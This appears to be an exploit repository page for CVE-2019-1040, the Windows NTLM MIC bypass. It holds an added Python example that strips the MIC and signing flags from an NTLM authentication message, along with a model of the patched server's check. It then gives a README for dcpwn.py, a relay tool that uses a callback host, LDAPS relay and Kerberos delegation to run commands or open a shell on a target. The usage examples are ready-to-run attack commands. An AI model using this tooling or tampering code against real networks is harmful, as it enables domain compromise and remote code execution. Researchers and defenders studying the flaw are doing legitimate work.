
CVE-2019-1040 PoC — Windows NTLM Tampering Vulnerability

Associated Vulnerability
Title: Windows NTLM Tampering Vulnerability (CVE-2019-1040)
Description: A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features. To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature. The update addresses the vulnerability by hardening NTLM MIC protection on the server side.
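The tampering step the description refers to, shown as an added example that is not code from dcpwn.py or impacket: parse an NTLM AUTHENTICATE_MESSAGE (type 3) laid out per MS-NLMP, clear the signing, key-exchange and version flags, drop the Version and MIC fields and re-pack the payload with corrected offsets. It also shows the presence check a server hardened against this attack can apply: the MsvAvFlags bit inside the NTLMv2 response is covered by NTProofStr, so a relay cannot clear it, and a message whose keyed AV flags announce a MIC but which carries none is inconsistent. The sample message, its field values and all function names are constructed for this example, and `patched_server_rejects` is a model of the hardening rather than Microsoft's code.

```python
# Added example for CVE-2019-1040 (not code from dcpwn.py or impacket).
# Sample message contents below are constructed for this example.
import struct

SIGNATURE = b"NTLMSSP\x00"
AUTHENTICATE = 3

# NegotiateFlags (MS-NLMP 2.2.2.5)
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
NTLMSSP_NEGOTIATE_TARGET_INFO = 0x00800000
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
NTLMSSP_NEGOTIATE_KEY_EXCH = 0x40000000

# Payload descriptors (Len, MaxLen, Offset) follow the 12-byte header in this order.
FIELD_NAMES = ("lm_response", "nt_response", "domain", "user", "workstation", "session_key")
FIXED_LEN = 12 + 6 * 8 + 4        # header, six descriptors, NegotiateFlags = 64 bytes

# AV_PAIR ids inside the NTLMv2 response (MS-NLMP 2.2.2.1)
MSV_AV_EOL, MSV_AV_NB_DOMAIN_NAME, MSV_AV_FLAGS = 0, 2, 6
MSV_AV_FLAG_MIC_PRESENT = 0x2


def parse_authenticate(data):
    """Return the payload fields, flags, Version and MIC of a type 3 message."""
    if data[:8] != SIGNATURE or struct.unpack_from("<I", data, 8)[0] != AUTHENTICATE:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    msg = {"flags": struct.unpack_from("<I", data, 60)[0]}
    first_payload = len(data)
    for i, name in enumerate(FIELD_NAMES):
        length, _maxlen, offset = struct.unpack_from("<HHI", data, 12 + 8 * i)
        msg[name] = data[offset:offset + length]
        if length:
            first_payload = min(first_payload, offset)
    # Version (8 bytes) and MIC (16 bytes) sit between NegotiateFlags and the
    # payload; their presence is inferred from where the first payload field starts.
    msg["version"] = data[64:72] if first_payload >= 72 else b""
    msg["mic"] = data[72:88] if first_payload >= 88 else b""
    return msg


def build_authenticate(msg):
    """Serialise a dict from parse_authenticate, recomputing every payload offset."""
    trailer = msg["version"] + msg["mic"]
    header_len = FIXED_LEN + len(trailer)
    descriptors, payload = b"", b""
    for name in FIELD_NAMES:
        value = msg[name]
        descriptors += struct.pack("<HHI", len(value), len(value), header_len + len(payload))
        payload += value
    return (SIGNATURE + struct.pack("<I", AUTHENTICATE) + descriptors
            + struct.pack("<I", msg["flags"]) + trailer + payload)


def strip_mic_and_signing(data):
    """The CVE-2019-1040 tampering: clear SIGN/ALWAYS_SIGN/KEY_EXCH/VERSION and
    drop Version and MIC, leaving the keyed NTLMv2 response untouched."""
    msg = parse_authenticate(data)
    msg["flags"] &= ~(NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN
                      | NTLMSSP_NEGOTIATE_KEY_EXCH | NTLMSSP_NEGOTIATE_VERSION)
    msg["version"] = b""
    msg["mic"] = b""
    return build_authenticate(msg)


def nt_response_claims_mic(nt_response):
    """Walk the AV_PAIRs of an NTLMv2 response; True if MsvAvFlags announces a MIC.
    NTProofStr is an HMAC over these bytes, so a relay cannot clear the bit."""
    pos = 16 + 28                     # NTProofStr + fixed part of NTLMv2_CLIENT_CHALLENGE
    while pos + 4 <= len(nt_response):
        av_id, av_len = struct.unpack_from("<HH", nt_response, pos)
        if av_id == MSV_AV_EOL:
            break
        if av_id == MSV_AV_FLAGS and av_len == 4:
            flags = struct.unpack_from("<I", nt_response, pos + 4)[0]
            return bool(flags & MSV_AV_FLAG_MIC_PRESENT)
        pos += 4 + av_len
    return False


def patched_server_rejects(data):
    """Assumed model of the hardened server check (not Microsoft's code): reject
    when the client's keyed AV flags announce a MIC but the message carries none."""
    msg = parse_authenticate(data)
    return nt_response_claims_mic(msg["nt_response"]) and not msg["mic"]


def constructed_sample():
    """Constructed AUTHENTICATE_MESSAGE: placeholder NTProofStr, MIC and session
    key, with MsvAvFlags = MIC present as current Windows clients send."""
    av_pairs = (struct.pack("<HH", MSV_AV_NB_DOMAIN_NAME, 8) + "CORP".encode("utf-16-le")
                + struct.pack("<HHI", MSV_AV_FLAGS, 4, MSV_AV_FLAG_MIC_PRESENT)
                + struct.pack("<HH", MSV_AV_EOL, 0))
    # RespType, HiRespType, Reserved1+2, TimeStamp, ChallengeFromClient, Reserved3
    client_challenge = b"\x01\x01" + bytes(6) + bytes(8) + b"\x11" * 8 + bytes(4)
    return build_authenticate({
        "flags": (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_NTLM
                  | NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
                  | NTLMSSP_NEGOTIATE_TARGET_INFO | NTLMSSP_NEGOTIATE_VERSION
                  | NTLMSSP_NEGOTIATE_KEY_EXCH),
        "lm_response": bytes(24),
        "nt_response": b"\xaa" * 16 + client_challenge + av_pairs,
        "domain": "CORP".encode("utf-16-le"),
        "user": "alice".encode("utf-16-le"),
        "workstation": "WS01".encode("utf-16-le"),
        "session_key": b"\xcc" * 16,
        "version": bytes([10, 0, 0x61, 0x4a, 0, 0, 0, 0x0f]),
        "mic": b"\xbb" * 16,
    })


if __name__ == "__main__":
    original = constructed_sample()
    tampered = strip_mic_and_signing(original)
    before, after = parse_authenticate(original), parse_authenticate(tampered)
    print("flags  %08x -> %08x" % (before["flags"], after["flags"]))
    print("length %d -> %d bytes (Version and MIC dropped)" % (len(original), len(tampered)))
    print("patched server rejects tampered message:", patched_server_rejects(tampered))
```

Clearing NTLMSSP_NEGOTIATE_SIGN is what lets the relayed authentication land on an LDAP(S) endpoint that does not enforce signing, even though the original SMB client asked for it; the NTLMv2 response is left byte-for-byte intact because NTProofStr is keyed with the user's NT hash, which is also why the MsvAvFlags bit survives and gives a patched server something to check the missing MIC against.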
Description: CVE-2019-1040 with Kerberos delegation
Readme
# CVE-2019-1040-dcpwn

Great writeup! [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/).

So I wrote dcpwn.py to make the attack easy to run. It follows that writeup: the target is made to authenticate back to the attacker host (`--callback-ip`), that NTLM authentication is relayed to LDAPS on the domain controller with the MIC removed, and Kerberos delegation (`--impersonate` drives the S4U2Self step) is then used to get a service ticket for the target. This only works against a domain controller that has not received the CVE-2019-1040 update and that does not enforce LDAP signing or channel binding on LDAPS.

## Requirements
This tool requires [impacket](https://github.com/SecureAuthCorp/impacket). You can install it with pip:
```
pip install impacket
```

## Usage
```
usage: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
                [--smb-port [destination port]] --callback-ip CALLBACK_IP
                --ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
                [--impersonate IMPERSONATE] -t Target [-share SHARE]
                [--command [COMMAND [COMMAND ...]]] [--debug]

CVE-2019-1040 with Kerberos delegation

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NTLM hashes
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  --smb-port [destination port]
                        Destination port to connect to SMB Server
  --callback-ip CALLBACK_IP
                        Attacker hostname or IP
  --ldaps LDAPS         Hostname or IP of the LDAPS server
  --dc-ip DC_IP         Domain controller ip address
  --timeout TIMEOUT     timeout in seconds
  --impersonate IMPERSONATE
                        target username that will be impersonated (through
                        S4U2Self) when requesting the ST. Keep in mind this
                        will only work if the identity provided to this
                        script is allowed to delegate to the SPN specified
  -t Target, --target Target
                        Hostname/IP of the target server
  -share SHARE          share where the output will be grabbed from (default
                        ADMIN$)
  --command [COMMAND [COMMAND ...]]
                        command to execute at the target. If empty it will
                        launch a semi-interactive shell
  --debug               Enable debug output
```

example:
```
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackerip --ldaps ldapsip --dc-ip DCip -t target
```
![](https://blogpics-1251691280.file.myqcloud.com/imgs/20190618200631.png)

If you want to execute a command (for example cmd.exe), use `--command`.

example:
```
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackerip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'
```

If you want to impersonate a specific user, use `--impersonate`.

example:
```
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackerip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone
```